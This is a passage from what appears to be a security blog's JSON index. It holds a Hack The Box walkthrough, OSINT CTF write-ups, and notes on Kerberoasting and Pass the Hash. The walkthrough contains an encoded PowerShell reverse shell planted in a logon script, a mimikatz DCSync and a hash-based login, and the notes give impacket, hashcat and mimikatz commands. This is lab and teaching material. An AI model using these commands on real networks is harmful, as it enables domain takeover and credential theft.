ASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA= Now we can add this payload and wait for a reverse shell:\n1echo \u0026#34;powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMwA3ACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=\u0026#34; | out-file C:\\windows\\SYSVOL\\sysvol\\blazorized.htb\\scripts\\A32FF3AEAA23\\login.bat -Encoding ASCII Start a netcat listener and wait for it to come back:\n1nc -nvlp 443 DCSync to Administrator Looking at Bloodhound we can see that the user SSA_6010 has dcsync permission to the domain. This will allow us to use mimikatz to perform a dcsync attack: This new shell from the PowerShell payload kept crashing so I moved another reverse shell generated with msfvenom onto to get another shell back to my Kali machine. After this I uploaded mimkatz and used lsadump::dcsync /domain:blazorized.htb /all. This gave the Admin hash:\n1.\\mimikatz.exe 2lsadump::dcsync /domain:blazorized.htb /all 1SAM Username : Administrator 2User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD ) 3Object Security ID : S-1-5-21-2039403211-964143010-2924010611-500 4Object Relative ID : 500 5 6Credentials: 7 Hash NTLM: f55ed1465179ba374ec1cad05b34a5f3 With this hash, I connected to the box with evil-winrm and collected the root flag:\n1evil-winrm -i blazorized.htb -u administrator -H \u0026#39;f55ed1465179ba374ec1cad05b34a5f3\u0026#39; "
  },
  {
    "title":     "DamCTF24 - Writeup",
    "permalink": "/posts/damctf24/",
    "date":      "jan 07 2024",
    "summary":   "Writeups for OSINT challenges I solved while competing in DamCTF24 - Placed 27th out of 207 teams.",
    "tags":      ["CTF"],
    "type":      "posts",
    "content":   "These writeups are for the OSINT challenges I solved while competing in DamCTF 2024 with my team, Bonzi_Brigade. This event took place from 06th April - 08th April. Our team scored 1380 points in total and came 27th out of 207 teams.\nasparagus? Authors: alienfoetus, WholeWheatBagels\nSolves: 44\nDescription: Last spring break, we took a short trip to see these special flowers! Can you find where we were?\nChallenge image: Since the framing of the challenge is the Oregon State University students going on a trip for spring break, I assumed that they would still be in Oregon. I started off by searching for wild purple flowers in Oregon. The ones shown in the screenshot below look to be similar to those found in the provided picture:\nOpening the site this image is from, we see that it is identified as \u0026ldquo;common camas\u0026rdquo;.\nNow that I knew the name of the flower, I searched for where they might be found in Oregon:\nThe Portland Nursery article links to the Oregon Camassia Natural Area:\nThe website for the Oregon Camassia Natural Area has a map showing the location:\nLooking at the Camassia Nature Area on Google maps we see I-205 is beside it. This could be the road that is behind the individual in the photo. We can find a familiar view by dropping down into street view on the road:\nThis picture was likely to be taken here giving a high degree of confidence that this is the location in the provided picture; the Camassia Natural Area.\nFlag:\n1dam{camassia-natural-area} grapes?? Authors: alienfoetus, WholeWheatBagels\nSolves: 13\nDescription: My dad had a friend take a picture of his speeder car, but we forgot where this was. Can you find the name of the vineyard in the background?\nHints:\nHint 1: Pay more attention to the environment rather than the speeder cars themselves.\nHint 2: You\u0026rsquo;re looking for a specific vineyard, not the winery that owns it.\nChallenge image: This photo was provided to the orangisers by Adam Weidenbach and used with permission during this CTF.\nAdam Weidenbach is based out of California so it\u0026rsquo;s likely the photo is from this part of the world.\nPutting the image into Google images, Google Lens focuses on the first train car. We can click on the result for the City of Douglas and it takes us to a document giving some history on trains, including these motor cars.\nWe see that they are called motor cars in this document:\nSearching for \u0026ldquo;california vineyard with motorcar track\u0026rdquo; we see this image for the Pacific Railcar Operators (PRO) group.\nOn this site we see the members standing with a Napa Valley sign. This sign lets us know that it is a \u0026ldquo;wine growing region\u0026rdquo;. It could be possible that they visited the area and Adam joined them.\nA list of the wineries along the track is available on the website. There is a left bend in the track at the very start of the provided picture. This got me to look around number 26 (Far Niente) as the track is seen to bend left before going straight alongside the road. I decided to check this area on Google Maps.\nFollowing the track in this area in Google Maps, we see this part that bends to the left, this is shown in the image below. It also has tree cover on either side. Dropping into street view to check this out we can only get a view from further up the track.\nThis has to be it: Google Maps street view\nComparing the features seen from the spot we are in, we can see that they are very similar:\n1 = dip down to smaller hill\n2 = distant trees seen in the gap can be seen in the provided picture\n3 = Hill in the foreground on the right with larger hill behind\nTo get more information on the vineyard, I looked for who owned the land. Reading this article pointed out that the sign was on the land of the Robert Mondavi Winery. Searching for the properties of Robert Mondavi Winery, we see there are 3 vineyards.\nLooking for more information on these, I started searching for maps of the vineyards and came across this map of To Kalon:\nVisting the webiste, we see that the field that is in the photo is To-Kalon vineyard giving us our flag.\nFlag:\n1dam{to-kalon-vineyard} Note: The OSU Security Club GitLab repo for this challenge contains the flag flag{martin-stelling-vineyard}. This extension of To Kalon is shown on the GuildSomm site provided above and would have been the next guess if the flag provided was not accepted.\n"
  },
  {
    "title":     "UTCTF 2024 - Writeups",
    "permalink": "/posts/utctf24/",
    "date":      "jan 03 2024",
    "summary":   "Writeups for OSINT challenges I solved while competing in UTCTF 2024 - Placed 135th out of 854 teams.",
    "tags":      ["CTF"],
    "type":      "posts",
    "content":   "These writeups are for the OSINT challenges I solved while competing in UTCTF 2024 with my team, Bonzi_Brigade. This event took place from 30th March - 01st April. Our team scored 4045 points in total and came 135th our of 854 teams.\nOSINT 1 Author: mzone (@mzone on discord)\nSolves: 202\nDescription: It seems like companies have document leaks all the time nowadays. I wonder if this company has any. (NOTE: It turns out there\u0026rsquo;s also an actual company named Kakuu in Japan. The real company is not in scope. Please don\u0026rsquo;t try and hack them.)\nHints:\nHint 1: You\u0026rsquo;re looking for a leaked document. You won\u0026rsquo;t find it on their website.\nHint 2: Accounts online associated with the scenario should be (fairly) distinguishable.\nA site was hosted for the company Kakuu Corporation and was provided with the challenge. Visiting this site we find that there is a list of employees provided.\nWith these names we can pass them over to Sherlock to check for accounts that may belong to any of these employees.\n1python3 sherlock.py \u0026lt;username\u0026gt; Checking out the Mastodon account for Cole Minerton we see that there is a mention of Kakuu Coporation.\nNow that we know that this is the right account we can visit the LinkTree provided on the Mastodon account and see what is available.\nWe will see that there are accounts on Twitter, Reddit, YouTube, and Mastodon linked.\nChecking out the YouTube account we find that there is a Discord link provided.\nFollowing this link gives us access to a Discord server called Cole\u0026rsquo;s Hangout. Scrolling through the chat we will see that Cole mentioned getting a client to sign a contract and uploaded a document.\nThe flag is provided on the second page of this leaked document.\nFlag:\n1utflag{discord_is_my_favorite_document_leaking_service} OSINT 2 Author: mzone (@mzone on discord)\nSolves: 141\nDescription: Can you find where the person you identified in the first challenge lives? Flag format is City,State,Zip. For example, if they live at UT Austin submit Austin,TX,78712.\nHints:\nHint 1: Follow the storyline.\nHint 2: All in scope accounts follow the same naming convention. Once you\u0026rsquo;ve reached a centralized location any sites you need can be reached in at most 3 clicks.\nComing back to the Mastodon account for Cole Minerton, we see that he has mentioned having a great time at Angel Fire and he plans to visit tomorrow. Since he is planning to visit the next day, it is likely that he lives in the area.\nSearching for Angel Fire, we will find that there is a village in the State of New Mexico by that name.\nCole made another post to Mastodon at some fuel pumps before going on a long distance drive.\nThe image provided has some clues to the location where the picture was taken. First we can confirm that it is likely to be New Mexico as there is a lottery advertisement for the state.\nSecondly, We see that there is a street sign showing Cimarron Ave. This gives us a state and street.\nGoing to Google Maps and searching for Cimarron Ave we see that there are three places in New Mexico with that name.\nDropping into street view we can look around the areas identified. Looking in the following location we see an area that looks familiar:\nGoogle Maps street view in Raton\nThis provides us with a location of Raton, New Mexico. Searching for the zip we see that it is 87740.\nFlag:\n1Raton,NM,87740 OSINT 3 Author: mzone (@mzone on discord)\nSolves: 96\nDescription: Can you find the person\u0026rsquo;s IP address? Flag format is XXX.XXX.XXX.XXX\nHints:\nHint 1: If you wound up on another (unrelated) discord server, then one of the sites you visited is too new.\nHint 2: All in scope accounts follow the same naming convention. Once you\u0026rsquo;ve reached a centralized location any sites you need can be reached in at most 3 clicks.\nLooking at the YouTube video Cole has posted, we see a comment where he mentions that he is interested in speedrunning a game called TinyIsland. Cole mentions that there is no wiki yet and that he will create it.\nChecking out the Reddit account listed on LinkTree we see that Cole is the new moderator of the tinyislandsurvival subreddit. On the right side of this page we that there is a wiki listed.\nOn the page we see that we have the option to view the history.\nLooking at the history we see posts from Coleminerton and then an IP address appears in the contributions.\nFlag:\n1181.41.206.31 "
  },
  {
    "title":     "Kerberoasting",
    "permalink": "/notes/kerberoasting/",
    "date":      "jan 01 0001",
    "summary":   "request TGS tickets for SPN accounts offline and crack them — no elevated privileges required.",
    "tags":      ["active-directory","kerberos","credential-access"],
    "type":      "notes",
    "content":   "what is it? Kerberoasting is an Active Directory attack that allows any authenticated domain user to request Kerberos service tickets (TGS) for accounts that have a Service Principal Name (SPN) set. Those tickets are encrypted with the service account\u0026rsquo;s NTLM hash, meaning they can be taken offline and cracked without any further interaction with the domain controller.\nThe attack is particularly effective because SPNs are often set on service accounts with weak passwords, and requesting a TGS is a normal, logged operation that blends in with everyday traffic.\nrequirements Any valid domain user account (no elevated privileges needed) Network access to the domain controller At least one service account with an SPN registered attack steps 1. enumerate SPNs Find accounts with SPNs set using impacket or native tools:\n1# impacket 2GetUserSPNs.py domain.local/user:password -dc-ip 10.0.0.1 3 4# PowerShell (on-box) 5setspn -T domain.local -Q */* 2. request and export tickets 1# request tickets and dump to file for offline cracking 2GetUserSPNs.py domain.local/user:password -dc-ip 10.0.0.1 -request -outputfile hashes.txt 3. crack offline 1hashcat -m 13100 hashes.txt /path/to/wordlist.txt --rules-file best64.rule -m 13100 is the hashcat mode for Kerberos 5 TGS-REP etype 23 (RC4).\nfull automation script 1#!/usr/bin/env python3 2# kerberoast.py — enumerate, request, and save TGS hashes 3import subprocess 4import argparse 5import sys 6 7def get_spns(domain, user, password, dc_ip): 8 cmd = [ 9 \u0026#34;GetUserSPNs.py\u0026#34;, 10 f\u0026#34;{domain}/{user}:{password}\u0026#34;, 11 \u0026#34;-dc-ip\u0026#34;, dc_ip, 12 \u0026#34;-request\u0026#34;, 13 \u0026#34;-outputfile\u0026#34;, \u0026#34;hashes.txt\u0026#34; 14 ] 15 print(f\u0026#34;[*] Targeting DC: {dc_ip}\u0026#34;) 16 print(f\u0026#34;[*] Enumerating SPNs for {domain}...\u0026#34;) 17 result = subprocess.run(cmd, capture_output=True, text=True) 18 if result.returncode == 0: 19 print(\u0026#34;[+] Hashes saved to hashes.txt\u0026#34;) 20 print(result.stdout) 21 else: 22 print(\u0026#34;[-] Failed:\u0026#34;, result.stderr, file=sys.stderr) 23 24if __name__ == \u0026#34;__main__\u0026#34;: 25 parser = argparse.ArgumentParser() 26 parser.add_argument(\u0026#34;domain\u0026#34;) 27 parser.add_argument(\u0026#34;user\u0026#34;) 28 parser.add_argument(\u0026#34;password\u0026#34;) 29 parser.add_argument(\u0026#34;dc_ip\u0026#34;) 30 args = parser.parse_args() 31 get_spns(args.domain, args.user, args.password, args.dc_ip) detection Event ID 4769 — Kerberos service ticket request. Look for a spike in requests from a single account, or requests for RC4 encryption (etype 0x17) when AES is the domain default. Honeypot SPNs — register a fake SPN on a decoy account with a strong password and alert on any TGS request for it. mitigation Use Group Managed Service Accounts (gMSA) — passwords are 120 characters, auto-rotated, and uncrackable in practice. Enforce AES-only Kerberos encryption on service accounts to prevent RC4 downgrade. Audit accounts with SPNs regularly: any interactive-login service account is a risk. tools impacket GetUserSPNs.py — most common, works remotely Rubeus — on-box, Rubeus.exe kerberoast PowerView — Get-DomainUser -SPN "
  },
  {
    "title":     "Pass the Hash",
    "permalink": "/notes/pass-the-hash/",
    "date":      "jan 01 0001",
    "summary":   "authenticate as a user using only their NTLM hash — no plaintext password needed.",
    "tags":      ["lateral-movement","credential-access","windows"],
    "type":      "notes",
    "content":   "what is it? Pass the Hash (PtH) is a technique that uses a captured NTLM hash to authenticate as a user without knowing their plaintext password. Because NTLM authentication uses the hash directly as a credential, an attacker with a valid hash can authenticate to any service that accepts NTLM — SMB, WMI, RDP (in some configs), and more.\nrequirements A captured NTLM hash (from mimikatz, secretsdump, or similar) Network access to the target Target must accept NTLM authentication (most Windows environments do) attack steps 1. obtain a hash 1# dump from lsass on a compromised host 2mimikatz # sekurlsa::logonpasswords 3 4# remote dump via impacket 5secretsdump.py domain/user:password@10.0.0.5 2. authenticate with the hash 1# psexec with hash 2psexec.py -hashes :ntlmhash domain/administrator@10.0.0.10 3 4# wmiexec 5wmiexec.py -hashes :ntlmhash domain/administrator@10.0.0.10 6 7# smbclient 8smbclient.py -hashes :ntlmhash domain/administrator@10.0.0.10 detection Event ID 4624 logon type 3 (network) with NTLM authentication where Kerberos would be expected Mismatched workstation names or unusual source IPs for privileged accounts mitigation Enable Protected Users security group — prevents NTLM auth for member accounts Disable NTLM where possible via GPO (Network security: Restrict NTLM) Use Credential Guard to protect lsass from memory reads Enforce tiered administration to limit where privileged hashes are cached "
  }
]
